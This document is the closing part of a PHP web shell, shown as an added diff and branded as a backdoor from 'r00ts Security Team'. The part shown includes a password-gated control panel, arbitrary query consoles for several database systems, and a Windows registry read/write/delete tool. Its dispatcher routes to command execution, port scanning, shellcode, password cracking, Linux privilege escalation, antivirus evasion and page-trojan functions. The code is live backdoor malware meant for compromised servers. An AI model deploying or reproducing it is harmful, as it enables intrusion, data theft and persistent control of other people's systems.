    '; + } + return false; +} +//other db connector +function otherdb(){ +$db = isset($_GET['db']) ? $_GET['db'] : ''; +print<< + +END; + +if ($db=="ms"){ +$mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost'; +$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa'; +$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : 'sa123'; +$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master'; +$msaction = isset($_POST['action']) ? $_POST['action'] : ''; +$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : ''; +$msquery = stripslashes($msquery); +print<< +
    Host: +User: +Pass: +Dbname:

    + +
    + + +
    +END; + +if ($msaction == 'msquery'){ +$msconn= mssql_connect ($mshost , $msuser, $mspass); +mssql_select_db($msdbname,$msconn) or die("connect error :" .mssql_get_last_message()); +$msresult = mssql_query($msquery) or die(mssql_get_last_message()); +echo ''; +echo ''; +echo "\n\n"; +for ($i=0; $i'. +mssql_field_name($msresult, $i); +echo "\n"; +} +echo "\n"; +mssql_data_seek($result, 0); +while ($msrow=mssql_fetch_row($msresult)) +{ +echo "\n"; +for ($i=0; $i'; +echo "$msrow[$i]"; +echo ''; +} +echo "\n"; +} +echo "
    \n"; +echo "
    "; +mssql_free_result($msresult); +mssql_close(); +} + } +elseif ($db=="ora"){ +$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost'; +$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521'; +$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root'; +$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456'; +$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL'; +$oraaction = isset($_POST['action']) ? $_POST['action'] : ''; +$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : ''; +$oraquery = stripslashes($oraquery); +print<< +
    Host: +Port: +User: +Pass: +SID:

    + +
    + + +
    +END; + +if ($oraaction == 'oraquery'){ + $oralink = OCILogon($orauser,$orapass,"(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST=$orahost)(PORT = $oraport))(CONNECT_DATA =(SID=$orasid)))") or die(ocierror()); + $oraresult=ociparse($oralink,$oraquery) or die(ocierror()); + $orarow=oci_fetch_row($oraresult); + echo ''; + echo ''; + echo "\n\n"; + for ($i=0; $i'. + oci_field_name($oraresult, $i); + echo "\n"; + } + echo "\n"; + ociresult($oraresult, 0); + while ($orarow=ora_fetch_row($oraresult)) + { + echo "\n"; + for ($i=0; $i'; + echo "$orarow[$i]"; + echo ''; + } + echo "\n"; + } + echo "
    \n"; + echo "
    "; + oci_free_statement($oraresult); + ocilogoff(); +} +} +elseif ($db == "ifx"){ +$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root'; +$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456'; +$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb'; +$ifxaction = isset($_POST['action']) ? $_POST['action'] : ''; +$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : ''; +$ifxquery = stripslashes($ifxquery); +print<< +
    Dbname: +User: +Pass:

    + +
    + + +
    +END; +if ($ifxaction == 'ifxquery'){ + $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg()); + $ifxresult = ifx_query($ifxquery,$ifxlink) or die (ifx_errormsg()); + $ifxrow=ifx_fetch_row($ifxresult); + echo ''; + echo ''; + echo "\n\n"; + for ($i=0; $i'. +ifx_fieldproperties($ifxresult); +echo "\n"; +} +echo "\n"; +mysql_data_seek($ifxresult, 0); +while ($ifxrow=ifx_fetch_row($ifxresult)) +{ +echo "\n"; +for ($i=0; $i'; +echo "$ifxrow[$i]"; +echo ''; +} +echo "\n"; +} +echo "
    \n"; +echo "
    "; +ifx_free_result($ifxresult); +ifx_close(); +} + } +elseif ($db=="db2"){ +$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost'; +$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000'; +$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root'; +$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456'; +$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql'; +$db2action = isset($_POST['action']) ? $_POST['action'] : ''; +$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : ''; +$db2query = stripslashes($db2query); +print<< +
    Host: +Port: +User: +Pass: +Dbname:

    + +
    + + +
    +END; +if ($myaction == 'db2query'){ +//$db2string = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=$db2dbname;"."HOSTNAME=$db2host;PORT=$db2port;PROTOCOL=TCPIP;UID=$db2user;PWD=$db2pass;"; +$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg()); +$db2result = db2_exec($db2link,$db2query) or die(db2_stmt_errormsg()); +$db2row=db2_fetch_row($db2result); +echo ''; +echo ''; +echo "\n\n"; +for ($i=0; $i'. +db2_field_name($db2result); +echo "\n"; +} +echo "\n"; +while ($db2row=db2_fetch_row($db2result)) +{ +echo "\n"; +for ($i=0; $i'; +echo "$db2row[$i]"; +echo ''; +} +echo "\n"; +} +echo "
    \n"; +echo "
    "; +db2_free_result($db2result); +db2_close(); +} + } +elseif($db == "fb") { +$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost'; +$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : ''; +$fbpath = str_replace("\\\\", "\\", $fbpath); +$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba'; +$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey'; +$fbaction = isset($_POST['action']) ? $_POST['action'] : ''; +$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : ''; +$fbquery = stripslashes($fbquery); +print<< +
    Host: +Path: +User: +Pass:
    + +
    + + +
    +END; +if ($fbaction == 'fbquery'){ + $fblink = ibase_connect($fbhost.':'.$fbpath,$fbuser,$fbpass) or die(ibase_errmsg()); + $fbresult = ibase_query($fblink,$fbquery) or die(ibase_errmsg()); + echo ''; + echo ''; + echo "\n\n"; + for ($i=0; $i'. + ibase_field_info($fbresult, $i); + echo "\n"; + } + echo "\n"; + ibase_field_info($fbresult, 0); + while ($fbrow=ibase_fetch_row($fbresult)) +{ +echo "\n"; +for ($i=0; $i'; +echo "$fbrow[$i]"; +echo ''; +} +echo "\n"; +} +echo "
    \n"; +echo "
    "; +ibase_free_result($fbresult); +ibase_close(); + } + } +else{ +$pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost'; +$pguser = isset($_POST['pguser']) ? $_POST['pguser'] : 'postgres'; +$pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : ''; +$pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres'; +$pgaction = isset($_POST['action']) ? $_POST['action'] : ''; +$pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : ''; +$pgquery = stripslashes($pgquery); +print<< +
    Host: +User: +Pass: +Dbname:

    + +
    + + +
    +END; + +if ($pgaction == 'pgquery'){ +$pgconn = pg_connect("host=$pghost dbname=$pgdbname user=$pguser password=$pgpass ") + or die( 'Could not connect: ' . pg_last_error()); +$pgresult = pg_query($pgquery) or die( 'Query failed: '.pg_last_error()); +$pgrow=pg_fetch_row($pgresult); +echo ''; +echo ''; +echo "\n\n"; +for ($i=0; $i'. +pg_field_name($pgresult, $i); +echo "\n"; +} +echo "\n"; +pg_result_seek($pgresult, 0); +while ($pgrow=pg_fetch_row($pgresult)) +{ +echo "\n"; +for ($i=0; $i'; +echo "$pgrow[$i]"; +echo ''; +} +echo "\n"; +} +echo "
    \n"; +echo "
    "; +pg_free_result($pgresult); +pg_close(); +} +} + } + +//control Registry with php +function phpreg(){ +$shell1 = new COM("wscript.shell") or die("require windows host"); +$action = isset($_POST['action']) ? $_POST['action'] : ''; +echo '
    '; +echo '
    Read & Write &Del reg

    '; +echo '
    '; +print<<
    +
    +Rpath:  + +

    +END; + +$rpath = isset($_POST['rpath']) ? $_POST['rpath'] : ''; +$rpath = str_replace("\\\\", "\\", $rpath); +if ($action=="read"){ +$out = $shell1->RegRead($rpath); +echo '
    '.var_dump($out).'
    '; +echo '

    '; +} + +print<<
    +
    Wpath: +

    +Wtype:  +Wvalue:  + +


    +END; + +$wpath = isset($_POST['wpath']) ? $_POST['wpath'] : ''; +$wpath = str_replace("\\\\", "\\", $wpath); +$wtype = isset($_POST['wtype']) ? $_POST['wtype'] : ''; +$wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : ''; +if ($action=="write"){ +$shell1->RegWrite($wpath, $wvalue, $wtype); +} + +print<<
    +
    +Dpath: + +

    +END; + +$dpath = isset($_POST['dpath']) ? $_POST['dpath'] : ''; +$dpath = str_replace("\\\\", "\\", $dpath); +if ($action=="del"){ +$out = $shell1->RegDelete($dpath); +} + } +function Root_Login($MSG_TOP) +{ +global $lanip; +print<< + +
    +
    +
    +
    {$MSG_TOP}
    +
    PASS:
    +
    +
    @Copyright spider Clean Backdoor and plus & modify by r00ts Security Team
    +
    Your IP : {$lanip}
    +
    +
    +
    + + +END; + return false; +} + +function WinMain() +{ + $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]); + $Server_OS = PHP_OS; + $Server_Soft = $_SERVER["SERVER_SOFTWARE"]; +print<< + r00ts Security Team New PHP Shell 2012-2013 + + + + + + + + +END; +return false; +} + +if(get_magic_quotes_gpc()) +{ + $_GET = Root_GP($_GET); + $_POST = Root_GP($_POST); +} +if($_GET['s'] == 'logout') +{ + setcookie('admin_b4che10rpass',NULL); + die(''); +} +if($_COOKIE['admin_b4che10rpass'] != md5($password)) +{ + ob_start(); + $MSG_TOP = 'LOGIN'; + if(isset($_POST['b4che10rpass'])) + { + $cookietime = time() + 24 * 3600; + setcookie('admin_b4che10rpass',md5($_POST['b4che10rpass']),$cookietime); + if(md5($_POST['b4che10rpass']) == md5($password)){die('');} + else{$MSG_TOP = 'This is my privileges, What are you doing man ?';} + + } + Root_Login($MSG_TOP); + exit(); + ob_end_flush(); +} + +if(isset($_GET['s'])){$s = $_GET['s'];if($s != 'a' && $s != 'n')Root_CSS();}else{$s = 'MyNameIsHacker';} +$p = isset($_GET['p']) ? $_GET['p'] : File_Str(dirname(__FILE__)); + +switch($s) +{ + case "a" : File_a($p); break; + case "b" : Guama_b(); break; + case "c" : Qingma_c(); break; + case "d" : Tihuan_d(); break; + case "e" : Antivirus_e(); break; + case "f" : Info_f(); break; + case "g" : Exec_g(); break; + case "h" : Com_h(); break; + case "i" : Port_i(); break; + case "j" : Shellcode_j(); break; + case "k" : Crack_k(); break; + case "l" : Linux_l(); break; + case "m" : Mysql_m(); break; + case "n" : Mysql_n(); break; + case "o" : phpreg(); break; + case "p" : File_Edit($_GET['fp'],$_GET['fn']); break; + case 'x' : phpcode();break; + case 'r' : phpsocket();break; + case 'w' : otherdb();break; + case 'z' : su();break; + case 'u' : Findfile_j(); break; + case 'v' : ftp_php();break; + default: WinMain(); break; +} +?> \ No newline at end of file